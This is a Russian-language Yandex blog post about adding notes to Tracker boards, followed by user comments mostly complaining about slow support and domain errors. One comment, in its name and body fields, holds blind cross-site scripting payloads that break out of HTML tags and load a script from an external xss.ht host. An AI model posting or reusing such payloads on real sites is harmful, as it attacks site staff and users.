Коннект, Трекер, Почта для домена

Новое в Трекере: заметки на досках

10 декабря 2018, 14:54

Новое в Трекере: заметки на досках

В Яндекс.Трекере теперь можно добавлять заметки на доску задач.

Пояснения, рекомендации, напоминания — любые комментарии закрепляются в верхней части колонок и видны всем участникам рабочего процесса.

Зачем нужны заметки

Используйте их так, как удобно вашей команде. Если вы работаете по методологии скрам, можете перечислить в заметке цели спринта:

  1. Добавить возможность регистрации пользователей на сайте.
  2. Исправить критичные ошибки.

Если для перевода задачи в следующий статус нужны какие-то сопроводительные действия — опишите их в заметке, чтобы не забыть. Например, разработчикам, передающим задачи в тестирование, можно напомнить:

Пожалуйста, укажите:

  • каким образом тестировать новые возможности,
  • какие части системы затронуты и требуют проверки.

Заметки сделают нагляднее критерии перевода задачи в какой-либо статус:

Решённую задачу закрываем не раньше, чем результат будет в общем доступе.

Любые вопросы или планы, связанные с рабочим процессом, можно отразить в заметке:

Одновременно с запуском надо опубликовать в блоге пост с рассказом о новой возможности.

Как создать заметку

Кнопки для добавления заметок появились в каждой колонке:

Кликните — и откроется окно для ввода. Оформить текст можно с помощью вики-разметки.

В каждой колонке можно опубликовать по одной заметке. Вне зависимости от движения задач она будет всегда наверху. Читать и редактировать заметки могут все пользователи, у кого есть доступ к доске.

Как начать работать с досками в Трекере:

22 комментария
Подскажите, пожалуйста, как достучаться до техподдержки Яндекс.Коннект, она же работает? С 29 ноября не могу добавить домен (сообщение, что домен у другого администратора  - Ticket#18112913484986984).  В тот же день я положил нужный файл в корень сайта, чтобы подтвердить владение, и с тех пор ни ответа ни привета. Домен не добавить, а пользоваться Яндекс.Коннект'ом  без этого нет смысла. 
Кира
Сотрудник Яндекса14 декабря 2018, 16:38
Almtv,
здравствуйте! Мы обязательно поможем Вам подключить домен. Мой коллега уже ответил Вам в заявке 18112913484986984.
Кира,
Добрый день, может и по моим заявкам посмотрите, а то почти 2 недели тривиальная проблема висит 
Ticket#18120416095239944
Ticket#18121012523898393
Спасибо!
Ермилов Никита
12 декабря 2018, 19:40
Добрый день! К сожалению могу сказать, что сервис стал хуже, чем pdd.yandex.ru Месяц назад перенесли домен, импортировали почтовые ящики и  их заблокировала ваша анти спам система. Поддержка молчит уже 2 недели Ticket#18111201025215599. 
Кира
Сотрудник Яндекса14 декабря 2018, 16:25
Ермилов Никита,
здравствуйте! Простите, пожалуйста, за задержку.
Мой коллега уже ответил Вам в заявке 18111201025215599. 
Ермилов Никита
7 января, 23:00
Кира,
 Лучше сделайте сервис платным, чтобы поддержка работа быстро. 
Жду ответа по тикету 18111201025215599
f.ponomarev@moskvichka.live
13 декабря 2018, 22:47
Добрый день. Никто не отвечает на тикеты в поддержку, напишу здесь. У нас не работают сервисы Ямб и Люди - помните, пожалуйста исправить, домен moskvichka.live
Кира
Сотрудник Яндекса14 декабря 2018, 16:42
f.ponomarev@moskvichka.live,
здравствуйте! Проверьте, пожалуйста, заявку 18121214290032715. Мой коллега уже ответил Вам :)
Добрый день.
Что у вас с техподдержкой??
Ticket#18110117143031143 висит с 1 ноября.
v.yurov@a3f.yaconnect.com
18 декабря 2018, 11:29
Как включить уведомления об изменениях в задачах на рабочем столе?
На данный момент получаю письма об изменениях в трекере задача на почту, но это неудобно.
Кира, спасибо вам за поддержку по Ticket#18112913484986984. После вашей помощи, 14 декабря наконец то был ответ по проблеме с просьбой указать нужный аккаунт. Аккаунт я указал, но, к сожалению, с тех пор дальнейших действий так и нет. Домен по прежнему не подключен, работать нет возможности. 
Присоединюсь к остальным. Заявки 18122606282787230 и 18121301213836996 с середины месяца висят. Ямб и рассылки по общим ящикам так и не работают. А работать людям нужно
Павел Лазер-Холл
3 января, 20:19
У нас всё отлично работает. :))) Спасибо. Собираемся на Трекер переходить для учёта задач дизайнерам и производству. Можно ли где почитать более подробно про сервис? Как к примеру удалить статусы в разделе Все статусы. Там очень много нам не нужных.
А будет ли когда-нибудь импорт ящиков?
Александр
15 января, 18:57
kamchatka,
давно есть:
https://yandex.ru/support/connect/mail-settings.html#mail-settings__section_ezf_3ld_r2b
Александр,
спасибо!
Но это было не вполне очевидно (там вообще ничего не понятно, в этом интерфейсе). А вместо сотрудников Яндекса на вопросы отвечают другие пользователи...
Эдуард Валеев
6 января, 05:09
Здравствуйте.
Очень долгое и томительное ожидание ответа от техподдержки на 
Ticket#18122110280731104

перед овым годом я ждал 5 дней, пока не пришлось достучаться через знакомых сотрудников Яндекса. Сейчас же, в этом тикете у меня висит вопрос с 28 декабря, однако воз и ныне там. Как быть?
"-->'><script/src=//johndoe.xss.ht></script>
9 января, 23:22
"'--></style></title></textarea></script>"><script src=https://johndoe.xss.ht>
Яндекс !!!! Аууу ! Вы совсем сломались ? 
Организацию добавить нельзя (ошибка 422), домен не МХ-записи, хоть убейся уже пару месяцев.
Домен открепил от аккаунта, акк удалил, а к новому не могу прикрепить....

Да что за на фиг такой ?
Добрый день! После отправки запроса в техподдержку (вчера) ничего не произошло (не пришло подтверждение о приеме запроса). В рекомендациях по отправке запроса указано, что не следует дублировать запросу в тех.поддержку. Как убедиться в том, что запрос дошел до тех.поддержки?


Сейчас не могу производить ряд важных операций (удаление домена из организации, удаление организации, переключение на основной домен, добавление пользователя) в рамках организации.
Не удалось завершить действие. Произошла ошибка 422. коннект мертв
Ермилов Никита
7 февраля, 13:33
Яндекс Живи ))) поддержка месяц молчит - 18111201025215599